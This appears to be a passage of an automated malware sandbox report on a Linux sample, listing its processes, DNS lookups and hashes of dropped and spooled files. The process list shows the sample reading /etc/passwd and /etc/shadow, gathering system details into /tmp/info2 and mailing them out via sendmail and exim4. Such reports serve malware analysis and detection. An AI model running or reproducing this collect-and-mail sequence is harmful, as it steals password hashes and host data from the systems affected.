| File opened for modification | /tmp/muTv8Nkw | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muS0iO4b | /usr/bin/mail | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/usr/bin/mail
[mail -s Linux debian9-mipsel-20240418-en-13 4.9.0-13-4kc-malta #1 Debian 4.9.228-1 (2020-07-05) mips GNU/Linux [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-13 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9j-0000Ce-0G]
/bin/sleep
[sleep 5]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1sMl9j-0000Ce-0G]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9k-0000Cn-Id]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | d20fbc2555eae6799ca62c8abbcf0917 |
| SHA1 | 6e0f851601aa4369bddbdedd64ec17a11d30e351 |
| SHA256 | 409157d1a59e1b7a323634d91913348bade070e938c299eb883c120c0586df4b |
| SHA512 | 1f91720a0a1d9be44708941f3547286238a1c0313d4e9e68a9efb329e8bae37e1d45923154d811343b38891c65ec40a79c0eb7df14258b0dea6c5306806d3baf |
/tmp/info2
| MD5 | d161e5c9d09b16c07cd4f33132023bc1 |
| SHA1 | 5ee1f1c9c07bed5ef9faf9295e47c3d1406146f4 |
| SHA256 | 65c1998c279949d05a346259388d16b7831d41c430ffe30584d87a1af593a3d5 |
| SHA512 | 9fad5954017dcfd7c8f5372e9e7ee003fb75bfe2326f5f4cb2e5754f25dcf9e4ba9d9378702d58e1a8a317c5c045f32bae09768c4f39f85672170f9347d93af8 |
/tmp/info2
| MD5 | 14dbdb43bacce2f3ceebe7d8e4a9b6f1 |
| SHA1 | 82dde42ae994b21af9b1f5f70d9ef1d48a10f3f4 |
| SHA256 | 7ddd4a31c23813ebf9992fb487d84c7c00e62e4311aa67425dc2f15de51e2f13 |
| SHA512 | 616dcf28145980c1de02e2c49bd5ba9ebb57bea976a82b79e8a38f33764c7d0c4a2dcc42333b3d3eceebba0e6c42d2d16a4c442bfd04eb77b5f93fbe6264f352 |
/tmp/info2
| MD5 | c0ef4f37430c4e69b9e743954e4f0893 |
| SHA1 | a6f58652afb8a0dbe35e3d3cfb132c3cf82dc31a |
| SHA256 | 81f5ec6907d884054b46e37b5e2300918eed25cd5eefd0730a073718c030dd5b |
| SHA512 | 7e83ef04a7037a0320df68ea7a592e9e074a3a1a7f6bf8f83665d983ad9926981d8c1fab46b4422904afc66ca32a7fbf74933422b75b9180178b6b56f7601a48 |
/tmp/info2
| MD5 | 15e07d6f143c0d49981b570c45d34a4d |
| SHA1 | 2a364272379857932a8a29e8350f974b2e1cb6ae |
| SHA256 | ef0b515e85fd32e30fe97965a081ac5b85505bb46b0e5f7d0c44b7ee911545e5 |
| SHA512 | 663ce0e9090f758de8601958c2c2a3d412be9d97fa0679a5c49e82a6c14fde028fa3815f1af9d6a4c9e9a81c248f56c00d48ec1f557809fdfd99e3f4daa5616a |
/var/spool/exim4/input/1sMl9j-0000Ce-0G-D
| MD5 | 22be44e3c2cdc8f06838b05acfe926a4 |
| SHA1 | 2e85770ed74a180edb214d609729cbc4811219ad |
| SHA256 | bc7af30d1c36e41f1eed8cb5e904342e668fe967cc2614bb4c984c989fa7568e |
| SHA512 | 570acf03fed85a4ce9397e78a16f085d33f680cf5b4ba8aed533d951b028fa74ce0f345abf263568468c276518560505e3d226ea4de4427f0da562a5b5c4e44b |
/var/spool/exim4/input/hdr.784
| MD5 | aea7c90da811efc918935991bb659bbc |
| SHA1 | b44cb50ecb8c03a4170a816a51c78bb7f1e009ff |
| SHA256 | be5aff11865fec7933e5cefbc643b2ec708cbc8ed01df1daec2d51c2d34a0d96 |
| SHA512 | 6136a82351de093750e8c97f6091d8ab3ab2fb7913ea6fd125d547ea670799e4ff1ec8f74ef593a5083d6e171636c8f1d412307293d324a711e8596267b82572 |
/var/spool/exim4/msglog/1sMl9j-0000Ce-0G
| MD5 | 0d5b19d1e57bfd8ffaceb20f629657a3 |
| SHA1 | 34efcdde1a3c62004e13514da29aca9e805b13e8 |
| SHA256 | 4fb72715ce953c39a7e7dba7cc1d812d8217db60a909e003f767764cea9936de |
| SHA512 | 57c282ce3ad821245510686c11b62dc4ab5732a1d0624c0a1221f19793beba63240fe71d379afef54b4fbe2b90907fd736dc809aa2668aaa3579a816285146ff |
/var/spool/exim4/msglog/1sMl9j-0000Ce-0G
| MD5 | e11b3c99ef47d5031867cc013c5334f9 |
| SHA1 | 845bdc58a1abd4c70a2fe134379d77fa4dd8c8a3 |
| SHA256 | cab3138ede41219bc056840fb20b792cc19b4c3bf324270d39e2a7ff9a60b86b |
| SHA512 | 9f39f82243b808ee9b7417f9b94daec527419e12904e2590baa29df8fa7980e7433b0ddd8aa7f454690fb9ec05ab99ce2a9a07c1035dde147365b43160af658f |
/var/spool/exim4/input/1sMl9k-0000Cn-Id-D
| MD5 | 994e5f70eae8d6ac6dacde9573fc535e |
| SHA1 | 2c8b4fcb8805a37d830bb6c23c399fdbb51d8cc3 |
| SHA256 | a404395c4114405405f44413f8dcf70d2feb380348a8aa91472f6be791f720c1 |
| SHA512 | 015dc8b3fc4593dc998ee437eb0b8b143b86ea38a45aafe3a3c195b9880aa61f39bccc7562ed0055a96d5932e614b65c83888844e4c59594cb4cf90d75ea0a23 |
/var/spool/exim4/input/hdr.793
| MD5 | 9c44580466aefbea963f6ed85434ee2e |
| SHA1 | a097bc187c1bc277093a851643d93ad1037154ee |
| SHA256 | 9f6fd40dfcac7c53ea211814990b4a25a9aedf7f151161c64b6f18a39152d29b |
| SHA512 | c8adb6f609ffe5b60da2a16d9a58052f34f32f4d5986dbffff9b4b4828e1a8d8c32da24c0177131dca5b9cc699cfdff504735a3311db4a677a740bbe193eb294 |
/var/spool/exim4/msglog/1sMl9k-0000Cn-Id
| MD5 | 3af5d89b4110bb0a80399167fc21e59e |
| SHA1 | d015c18cf232a3f365f8866c4af6f935ae0b98c5 |
| SHA256 | c4484145e289743d6e090d79374abc2a132a5b9e3cc0601fa48b6b0d7f701813 |
| SHA512 | 058f68d70629b32702d57d4e134501af9348fbe2ed493c02ebdcf339502d33e64863f1011c15e7d2b0711b8cbd9d23f4894b985651ebdde6ed8b9f65143aa4ee |
/var/spool/exim4/input/hdr.790
| MD5 | a07da5d491e18fdce753af5ce1f843c9 |
| SHA1 | d8858ae1c2f7e6bf204ff91978b88d37bf5e10d8 |
| SHA256 | 02ae76b449bd9bf98acf09ee2cbd66551cf5619a07cf4ab197f4e615538ee724 |
| SHA512 | 7de37301a10d48a4905559af97c4c74df8ea2f9cfa6fda1209a11515719a338c38e74573c2442d0d477c46d3d30505498d07fb3ac25aa5f7551b9a53cfdf1ba9 |
/var/mail/user
| MD5 | 3515ebcb849f017e8d1e6186b2c2f7ad |
| SHA1 | 0356b4b21b0fcdf79956d965f1ee03847ed21c0c |
| SHA256 | 20d2b30159081ced35f9f71da97c25ca1d241ae05aee8e42a4cf575526169239 |
| SHA512 | 11dd497cbc8a8f0c7362ab86af85756c8a0835f4213d72174492ef7d87e72cf11e08fe8b1609e1166a44d2f6d25a3e9d3bb9cfc0876be106a0b0cfc15c3281a4 |
/var/spool/exim4/input/1sMl9k-0000Cn-Id-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1sMl9k-0000Cn-Id
| MD5 | 67f70b48845041e131628e1d8ca7e741 |
| SHA1 | 2e7e14b6a62a2acb2c9cbc5a06d15a7c0433c54a |
| SHA256 | 71aabfb65e6091a7e059b303d4256ec337c88dab1bc7edbb8e1466346cba54b8 |
| SHA512 | 116ec7f94749689307365fc889c9f71bcb069af65cc4daecf47a09927dc5b578f6aaacf0512cd7e04a08e1686d1d93cc843798a24416c8a231ff9b6ee850e610 |